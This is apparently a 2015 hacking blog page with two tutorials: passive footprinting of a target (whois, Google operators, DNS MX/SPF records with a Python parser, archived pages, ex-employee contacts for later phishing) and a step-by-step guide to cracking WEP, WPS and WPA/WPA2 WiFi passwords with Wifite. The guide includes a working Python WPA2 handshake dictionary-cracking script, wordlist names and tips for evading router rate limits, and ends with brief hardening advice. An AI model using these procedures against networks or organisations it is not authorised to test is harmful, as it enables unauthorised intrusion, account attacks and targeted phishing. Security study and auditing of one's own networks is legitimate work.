Tuesday, September 1, 2015

Footprinting – Information Gathering Techniques






Footprinting is the reconnaissance phase of an ethical hacking engagement: gathering information about the target and its environment before any attack is attempted. Because it is a pre-attack stage, the priority is stealth, so that the activity cannot be traced back to you. Footprinting combines several information gathering techniques and tools.
Most of it can be done passively, using freely available public resources, with no direct contact with the target's systems. The information gathered here drives every later step of the engagement.

Footprinting – List of Information Gathering Techniques

There are many techniques and tools used in footprinting, and there is no fixed order in which to apply them. The goal is to gather as much information as possible, so use all of the following sources.
Website Footprinting: Simply visiting the target's website can yield a great deal of information: email addresses, partners, client lists, physical office addresses, HR openings and so on.
The website can also be probed for error pages. Errors can be triggered by submitting invalid data to a search box or contact form, and they often reveal the content management system and its version, the scripting language in use, and the type of server (Linux or Windows).
Whois Database Lookup: A whois lookup against the target's domain is an important step. It can reveal where the domain is registered and hosted (registrar, name servers and their location) along with the name, address and contact numbers of the domain owner and technical staff, unless the registrant uses a privacy service, in which case only the proxy's details are shown.
WHOIS Lookup Websites:
  • www.whois.com
  • www.whois.domaintools.com
  • www.whois.net
  • www.whois.com/whois/
Footprinting – whois (screenshot)
Search Engine Hacking: Running search queries against your target in Google, Yahoo, Bing and others can reveal a great deal of information if the queries are built properly. Google advanced search operators (Google hacking) help locate more specific material such as company policies, employee details and pages that are not linked from the main site.
Company details and reviews can be found on blogs, websites, review portals, forums and so on.
Google Search Command: site:facebook.com “himanshu negi” + “hacking”
The query above restricts results to facebook.com and returns pages that mention the name Himanshu Negi together with the word "hacking".
Information gathering via Google (screenshot)
Similar Domain Search: If example.com is the target's website, also look at example.in, example.net, example.org and other TLD variants. Country-specific hosts (in.example.com, uk.example.com) and language-specific hosts (en.example.com) can reveal further information.
The same company may run different operations in different countries and publish different information in different languages, so a similar-domain search widens the picture from every angle.
Try: touch.facebook.com, mbasic.facebook.com, facebook.com.
Negative Website Search: Searching for "negative" sites about the target can turn up websites that give insight into problems inside the organization. If the target is example.com, you may find example-company-sucks.com.
PayPal.com is a payment gateway that lets people buy and sell online and move money across borders worldwide, but the site in the screenshot below tells a different story.
PayPal negative website – information gathering (screenshot)
Social & Business Networking Websites: For more detailed information about a company or person, look at sites like LinkedIn, Google+ and similar. They reveal detailed business information and professional connections.
Facebook may host fake profiles, pages and unofficial groups about a company, so its information is not always trustworthy. LinkedIn, as a professional network, usually carries more reliable and frequently updated profiles and pages with detailed inside information.
Top social professional website: https://www.linkedin.com
People search/look-up websites may also prove helpful.
Classified/Job Websites: To learn what a company actually offers and sells, search for it on classified sites. You will find real working contact addresses and inside information.
Classified and job sites may list HR openings that describe the software and technologies the target company uses: since they are recruiting people to work with the technology they already run, job postings tend to give this away.
Some Websites to Try:
  • www.locanto.in
  • www.olx.in
  • www.clickindia.com
  • www.quiker.com
  • www.naukri.com
  • www.monster.com
and many more.
Internet History – Archived Pages: Footprinting also includes looking for information that has since been removed from the website. The Internet Archive's Wayback Machine (archive.org, established in 1996) keeps archived copies of pages from most websites.
Information or pages removed from a website may contain details of former employees. These ex-employees can be contacted and may share useful information about their former company and work.
Footprinting – Archive.org – web history (screenshot)
DNS Footprinting – MX Entry: DNS (domain name system) record lookups reveal a great deal, including the MX entries, which indicate where mail is delivered and which email application or service is in use (hosted providers are recognisable from the MX hostnames, and the SPF TXT record lists the third parties allowed to send mail for the domain). This information can be used later to attack the mail services and accounts.
DNS Lookup Websites
  • www.dnswatch.info
  • www.who.is/dns
  • www.dnsstuff.com
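As an added example (not from the original post), here is a small Python script that does the MX analysis described above on the output of dig +noall +answer: it identifies a hosted mail provider from the MX hostnames and pulls the third-party senders out of the SPF TXT record. The dig output, the domain and the provider map are constructed for illustration; in practice you would paste in real dig output for the target.

```python
"""Passive mail footprinting from DNS: classify MX hosts and pull
third-party senders out of an SPF record.  Added example, not from
the original post; the dig output below is constructed, not a real lookup."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the format `dig +noall +answer example.com MX` / `... TXT` prints.
SAMPLE_DIG_OUTPUT = """\
example.com.    3600  IN  MX   20 alt1.aspmx.l.google.com.
example.com.    3600  IN  MX   10 aspmx.l.google.com.
example.com.    3600  IN  TXT  "v=spf1 include:_spf.google.com include:servers.mcsv.net ip4:203.0.113.0/24 -all"
example.com.    3600  IN  TXT  "google-site-verification=abc123"
"""

# MX hostname suffixes of hosted mail providers (assumption: a short illustrative map).
MX_PROVIDERS = {
    "google.com": "Google Workspace",
    "googlemail.com": "Google Workspace",
    "outlook.com": "Microsoft 365",
    "pphosted.com": "Proofpoint",
    "mimecast.com": "Mimecast",
}

_MX_RE = re.compile(r"^\S+\s+\d+\s+IN\s+MX\s+(\d+)\s+(\S+)$")
_TXT_RE = re.compile(r'^\S+\s+\d+\s+IN\s+TXT\s+"(.*)"$')


def parse_dig_answer(text: str) -> Tuple[List[Tuple[int, str]], List[str]]:
    """Return (MX records sorted by preference, TXT record strings) from dig answer lines."""
    mx, txt = [], []
    for line in text.splitlines():
        line = line.strip()
        m = _MX_RE.match(line)
        if m:
            mx.append((int(m.group(1)), m.group(2).rstrip(".").lower()))
            continue
        t = _TXT_RE.match(line)
        if t:
            txt.append(t.group(1))
    mx.sort()  # lowest preference value is the primary mail exchanger
    return mx, txt


def mail_provider(mx_host: str) -> Optional[str]:
    """Map an MX hostname to a known hosted-mail provider by suffix; None if self-hosted/unknown."""
    for suffix, provider in MX_PROVIDERS.items():
        if mx_host == suffix or mx_host.endswith("." + suffix):
            return provider
    return None


def parse_spf(txt_records: List[str]) -> Optional[Dict[str, object]]:
    """Extract include:/ip4:/ip6: mechanisms and the 'all' qualifier from the v=spf1 record."""
    for rec in txt_records:
        if not rec.lower().startswith("v=spf1"):
            continue
        result: Dict[str, object] = {"include": [], "ip4": [], "ip6": [], "all": None}
        for token in rec.split()[1:]:
            if token.startswith("include:"):
                result["include"].append(token[len("include:"):])   # third-party senders
            elif token.startswith("ip4:"):
                result["ip4"].append(token[4:])                     # the target's own ranges
            elif token.startswith("ip6:"):
                result["ip6"].append(token[4:])
            elif token.lstrip("+-~?") == "all":
                result["all"] = token if token[0] in "+-~?" else "+all"
        return result
    return None  # no SPF record published


def footprint_mail(text: str) -> Dict[str, object]:
    """Summarise what the MX and SPF records say about how the target handles mail."""
    mx, txt = parse_dig_answer(text)
    providers = sorted({mail_provider(h) for _, h in mx if mail_provider(h)})
    return {
        "mx": mx,
        "providers": providers or ["self-hosted or unknown"],
        "spf": parse_spf(txt),
    }


if __name__ == "__main__":
    for key, value in footprint_mail(SAMPLE_DIG_OUTPUT).items():
        print(f"{key}: {value}")
```

The include: entries are often as telling as the MX records: in the constructed sample they show a newsletter platform sending on the target's behalf, which is exactly the kind of third party that turns up later in phishing and mail-spoofing work.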
Trace Route: traceroute on Linux (tracert on Windows) traces the network path between your machine and the target system, revealing the intermediate routers and hosting provider. Some websites also offer trace-routing, for example https://who.is/tools/.
Footprinting, then, is a set of simple techniques for gathering information passively. It is legal as long as the collected information is not misused. The steps are simple enough that a non-technical person can follow them, yet they are very effective.
Footprinting is vital for every hacking or information gathering step you perform next.

How to Hack WiFi Password? Cracking WEP, WPA/WPA2, WPS with Wifite





Wifite is a Linux tool (available on Kali, BackTrack 5, BlackBuntu, BackBox and Pentoo) that attacks multiple encrypted networks (WEP, WPA/WPA2 and WPS) in a row. It is designed to run with only a few arguments; Wifite aims to be the "set it and forget it" wireless auditing tool. In this tutorial we use Wifite to recover the WiFi password of WEP, WPA/WPA2 and WPS-secured networks.

A few months ago I published an article on cracking a WEP WiFi key with aircrack-ng. That article involved several programs and a number of commands; it was well received and many readers wrote to thank me for it. But sometimes you just need automation, and that is where wifite comes in: a very efficient, fully automated wireless auditing tool, which this article covers.
More wifite Help (source code): https://github.com/derv82/wifite
INTRODUCTION TO WIFI SECURITY: WEP, WPA/WPA2 and WPS are different technologies used to protect WiFi from unauthorized access. WEP and WPA/WPA2 are encryption schemes; WPS is a setup mechanism that lets a client join a WPA/WPA2 network with an 8-digit PIN instead of the passphrase.
WEP stands for Wired Equivalent Privacy,
WPA stands for Wi-Fi Protected Access &
WPS stands for Wi-Fi Protected Setup.
In this tutorial I'm going to demonstrate how to recover a WiFi password using Wifite. We'll attack WEP, WPA, WPA2 (cracked the same way as WPA) and WPS-enabled WiFi.

THINGS WE NEED

  • Kali Linux (includes the aircrack-ng suite and wifite).
  • An external WiFi adapter or the built-in WiFi device; it must support monitor mode and packet injection, which is why the adapters below are recommended.
HARDWARE INFO:
I have been asked several times about the hardware I use. It's a plug-and-play TP-LINK TL-WN722N USB wireless adapter from Amazon.
If you want a better-range, better-quality adapter for Kali, I recommend the Alfa AWUS036NH. Also consider a higher-gain antenna (9-12 dBi).
For extreme range, try the TP-LINK TL-ANT2424B 2.4GHz 24dBi directional antenna (reportedly good for up to 56 km with line of sight).

TIME NEEDED – To Hack WiFi’s Passwords

Wifite is an efficient automated tool that only asks you to choose your target. Advanced users can use its switches and options to customize it to their needs.
WEP – usually less than 10 minutes (2 minutes in our case) – near-certain success.
WPA or WPA2 – anywhere from a few seconds to never, depending on the passphrase and your wordlist – roughly a 20% chance.
WPS-enabled WPA/WPA2 – usually a few hours (2 to 12) – roughly a 50% chance.
Factors affecting the process:
  • Greater distance between you and the target slows the process.
  • More traffic and more users on the target network speed it up (more packets for WEP, more chances to capture a WPA handshake).
  • A poor wireless adapter slows things down (generally speaking).
  • Many WiFi networks around you, especially on the same channels, slow it down.

Tutorial: Let’s Hack WiFi Passwords with Wifite:

Ready? Go to Applications > Kali Linux > Wireless Attacks > 802.11 wireless tools > Wifite, or simply type wifite in a terminal (you must be root). Wifite puts the adapter into monitor mode and lists the available WiFi access points.
Screenshot: Wifite listing nearby access points.
Wait a few seconds to a couple of minutes and all nearby networks are listed. You will notice three kinds: WEP, and WPA/WPA2 with and without WPS enabled. We will attack each in turn.
Let's begin with WEP, then move on to WPA/WPA2, and finally to WPS-enabled WPA/WPA2.
* Choosing a network with good signal strength and at least one associated client is the best bet; otherwise get ready for frustration!

How to Hack WiFi Password – WEP?

With Wifite you don't have to do anything but choose the target NUM (1, 2, 3, ..., n). Wifite currently has five WEP attacks, which together give an almost 100% chance of recovering the WEP key.
An attack shouldn't take more than 10 minutes; if one WEP attack fails, the next is started automatically (for another 10 minutes).
In the image below I choose NUM 2, a WEP network with clients, although the signal is quite low. After selecting "2" the WEP key was recovered in just 2 minutes.
Screenshot: Wifite recovering the WEP key.
Wifite prints the WEP key in hexadecimal. Most clients accept the hex key directly as the WiFi password; if the owner originally typed an ASCII passphrase, the hex bytes decode to it with any hex-to-ASCII converter (a key that was generated as raw hex has no ASCII form and must be entered as hex).
Note: I had also shown same WEP WiFi password hacking (with aircrack-ng suite) in my previous article – How to Crack WEP WiFi Key on Kali Linux Using Aircrack-ng!.

Cracking WPS WiFi Password

As with WEP, there is little to do: choose your WPS-enabled target and watch. As mentioned, it may take from a few minutes to several hours depending on the router, so be patient.
Screenshot: Wifite WPS attack in progress.
Troubleshooting: Some routers rate-limit PIN attempts (the WPS attack is a brute force of the PIN), and Wifite then displays "WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking". At that point you may be out of luck, or you may need to tune Wifite's options; many tweaks are documented online.
(Hint: spoofing your MAC address to match an associated client, or adding a delay between PIN attempts (reaver's -d 60), might help.)
NOTE: Wifite uses reaver (a WPS-only tool) internally for the WPS attack. As far as I know, Wifite does not expose reaver's session saving (there is no pause/resume), so if Wifite fails on WPS you start over, whereas reaver run directly saves its progress automatically and can resume the next day or week.

How to Hack WPA/WPA2 WiFi Password?

Again, there is little to do: choose your WPA/WPA2 target and wait. As mentioned, it may take from a few minutes to never, depending on the password strength. The stronger the password, the harder it is to recover.
The handshake is the 4-way exchange captured when the router (access point) and a client (laptop, phone or other WiFi device) authenticate to each other. It does not contain the password itself, but it carries values derived from it (a message integrity code computed with keys derived from the passphrase), so candidate passwords can be tested against it offline: each guess is run through the same key derivation and accepted only if it reproduces the captured integrity code. Trying many candidates this way is the dictionary (brute-force) attack; capturing the handshake itself usually takes under two minutes when a client is present, because Wifite deauthenticates clients to force them to reconnect.
A dictionary file usually contains known words from dictionaries in various languages plus passwords from other sources; any of them might be the WiFi password. Dictionaries range from a few thousand to billions of entries.
A password file may instead contain every combination of characters and digits (even special symbols), which makes it huge and demands a lot of computing power.
Hint: try rockyou.txt, darkc0de.lst or the CrackStation wordlists.
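To make concrete what "brute-forcing the handshake offline" means, here is an added Python example (not code from the post, wifite or aircrack-ng) that derives the WPA2-PSK keys the way a cracker does: PBKDF2 of the candidate passphrase and SSID gives the PMK, the 802.11i PRF gives the PTK, and its first 16 bytes (the KCK) recompute the MIC of the second handshake message. A candidate is correct when the recomputed MIC matches the captured one. The handshake here is constructed from a known passphrase so the block runs offline; the SSID "TEST" and the BSSID come from the capture filename in the post, while the client MAC, the nonces and the EAPOL bytes are made up.

```python
"""WPA2-PSK offline dictionary attack against a captured 4-way handshake.
Added example, not from the original post, wifite or aircrack-ng.  The
handshake below is constructed from a known passphrase so this runs
offline; client MAC, nonces and EAPOL bytes are made up."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA-1 output, truncated to 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP MIC: first 16 bytes of HMAC-SHA1 over the EAPOL frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
                    eapol_mic_zeroed: bytes, captured_mic: bytes,
                    wordlist: Iterable[str]) -> Optional[str]:
    """Try every candidate passphrase; return the one whose recomputed MIC matches the capture."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:  # WPA-PSK passphrases are 8..63 characters
            continue
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


def build_captured_mic(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """Stand-in for a real capture: the MIC a client holding `passphrase` would have sent."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return eapol_mic(kck, eapol_mic_zeroed)


# --- constructed sample handshake -------------------------------------------
SSID = "TEST"
AP_MAC = bytes.fromhex("c0a0bb045ca9")   # BSSID from the post's capture filename
STA_MAC = bytes.fromhex("001122334455")  # made-up client MAC
ANONCE = bytes(range(32))                # made-up AP nonce
SNONCE = bytes(range(32, 64))            # made-up client nonce
# Made-up EAPOL-Key message 2 with its 16-byte MIC field zeroed.  Only the bytes
# matter to the HMAC, not their meaning, so a placeholder body is enough here.
EAPOL_M2_MIC_ZEROED = bytes.fromhex("0103007502010a00") + b"\x00" * 10 + SNONCE + b"\x00" * 48
CAPTURED_MIC = build_captured_mic("letmein123", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                  EAPOL_M2_MIC_ZEROED)
WORDLIST = ["password", "12345678", "qwertyuiop", "letmein123", "correcthorsebatterystaple"]

if __name__ == "__main__":
    found = crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                            EAPOL_M2_MIC_ZEROED, CAPTURED_MIC, WORDLIST)
    print("passphrase:", found)
```

Each candidate costs 4096 HMAC-SHA1 iterations and there is no shortcut from the handshake back to the passphrase, which is why only passphrases present in the wordlist fall quickly and why the "few seconds to never" estimate above is accurate. WPA (TKIP) handshakes use HMAC-MD5 for the MIC instead; this block handles WPA2/CCMP only.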
Screenshot: cracking the WPA2 handshake with a wordlist.
The command in the screenshot cracks the saved handshake (TEST_C0-A0-BB-04-5C-A9.cap) using a wordlist (rockyou.txt) that I keep at /root/DICTIONARY/.
Screenshot: WPA2 password recovered.
The WPA2 network above was cracked easily because the password was weak; with a strong password you may wait hours, days or months, and the truth is that even after months you may fail. A passphrase that appears in no wordlist and is too long to enumerate is, for practical purposes, out of reach of this attack.
You might also be interested in reading the article – How to Crack WEP WiFi Key on Kali Linux Using Aircrack-ng!.

How to Protect your WiFi from getting Hacked?

From the above demonstration it's clear that recovering WiFi passwords can be very easy. Focus on tightening your own WiFi security (rather than going to jail for hacking someone else's). I hope this article makes the average Internet user aware of information security and WiFi attacks. Here are some tips you can apply:
  • Switch from WEP to WPA2. WEP is deprecated and is broken regardless of how strong the key is.
  • Disable WPS: its PIN design has well-known weaknesses (search for the WPS CVEs, Common Vulnerabilities and Exposures).
  • Use a long passphrase that will not appear in any wordlist, and change it periodically so that anyone who does obtain it cannot enjoy your Internet connection for long.
  • Finally, audit your own WiFi as shown in this article, upgrade your security, then repeat the audit and confirm the improvement.
